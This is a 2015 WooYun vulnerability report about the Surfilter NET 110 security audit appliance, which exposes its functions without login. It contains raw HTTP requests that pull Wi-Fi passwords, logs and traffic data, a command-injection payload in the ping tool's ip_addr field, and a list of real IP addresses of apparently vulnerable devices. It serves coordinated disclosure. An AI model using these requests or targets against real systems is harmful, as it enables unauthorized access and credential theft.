当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102784

漏洞标题:任子行网络安全审计系统未登录情况下使用系统任何功能疑似后门

相关厂商:任子行

漏洞作者: YY-2012

提交时间:2015-03-21 11:56

修复时间:2015-06-24 08:18

公开时间:2015-06-24 08:18

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-21: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-03-29: 细节向第三方安全合作伙伴开放
2015-05-20: 细节向核心白帽子及相关领域专家公开
2015-05-30: 细节向普通白帽子公开
2015-06-09: 细节向实习白帽子公开
2015-06-24: 细节向公众公开

简要描述:

可直接任意命令执行,可直接获取wifi密码,可直接获取内网连接信息,反正就是在不登录情况下能获取登录后所有系统信息。。

详细说明:

这个疑似“任子行”后门,为什么?
一般系统登录会判断Cookie值,而Cookie一般会随登录随机变化或随密码固定不变。如果Cookie不正确会提示登录等等未授权信息或提示重新登录信息,但是“任子行”NET 110网络安全审计系统很奇怪,居然把Cookie整个值删除后再访问就能获取相关信息。奇葩吧!

漏洞证明:

日志信息:

aaaaaa11111111111.jpg


aaaaaaa2222222222222.jpg


获取wifi密码:

aaaaaaa33333333333.jpg


任意系统命令执行:

aaaaa444444444444.jpg


aaaaa444444444444.2.jpg


aaaaa444444444444.3.jpg


aaaaa444444444444.4.jpg


aaaaa444444444444.5.jpg


获取用户流量统计

aaaaaaaaaaa555555555.jpg


获取系统日志
GET /cgi-bin/web_cgi?module=sys_log&op_req=read_system&start=0&limit=100 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://地址/
Accept: application/json, text/javascript, */*; q=0.01
If-Modified-Since: 0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)
Host: 地址
Proxy-Connection: Keep-Alive
获取wifi名称与密码
GET /cgi-bin/web_cgi?key_val=1&module=wl_safe&op_req=read_by_id HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://地址/
Accept: application/json, text/javascript, */*; q=0.01
If-Modified-Since: 0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)
Host: 地址
Proxy-Connection: Keep-Alive
Content-Length: 2
执行系统任意命令
POST /cgi-bin/web_cgi HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://地址/
Accept: application/json, text/javascript, */*; q=0.01
If-Modified-Since: 0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)
Host: 地址
Content-Length: 74
Proxy-Connection: Keep-Alive
Pragma: no-cache
ip_addr=127.0.0.1|ls -l&module=net_tool&op_req=read_system&sub_module=ping
获取用户浏览统计
GET /cgi-bin/web_cgi?module=user_traffic_total&op_req=read_system&scope=0&t_scope=2 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://地址/
Accept: application/json, text/javascript, */*; q=0.01
If-Modified-Since: 0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)
Host: 地址
Proxy-Connection: Keep-Alive
Content-Length: 2


反正所有功能都能获取,不一一举例了。。


案例:

http://219.150.20.218/login.html
http://219.150.20.84/login.html
http://219.150.20.249/login.html
http://122.138.194.122/login.html
http://218.62.109.138/login.html
http://122.140.92.78/login.html
http://122.143.116.206/login.html
http://119.52.188.70/login.html
http://122.143.188.194/login.html
http://122.141.94.122/login.html
http://58.245.209.182/login.html
http://119.52.248.18/login.html
http://58.244.248.54/login.html
http://61.184.82.217/login.html
http://122.140.90.18/login.html
http://61.184.81.172/login.html
http://61.136.65.158:81/login.html
http://61.182.80.59/login.html
http://218.29.210.226/login.html
http://222.160.174.50/login.html
http://221.11.33.70/login.html

修复方案:

联系厂商

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-03-26 08:16

厂商回复:

CNVD确认所述情况,同时厂商也在积极认领,已经转报厂商,厂商正积极处置.

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-24 12:24 | Soulmk ( 路人 | Rank:6 漏洞数:2 | 我是来学习滴~~)

    后台还存在弱口令啊

  2. 2015-06-24 15:10 | 冰麒麟 ( 路人 | Rank:0 漏洞数:2 | 就算是男孩子,只要可爱就没问题了.)

    有想法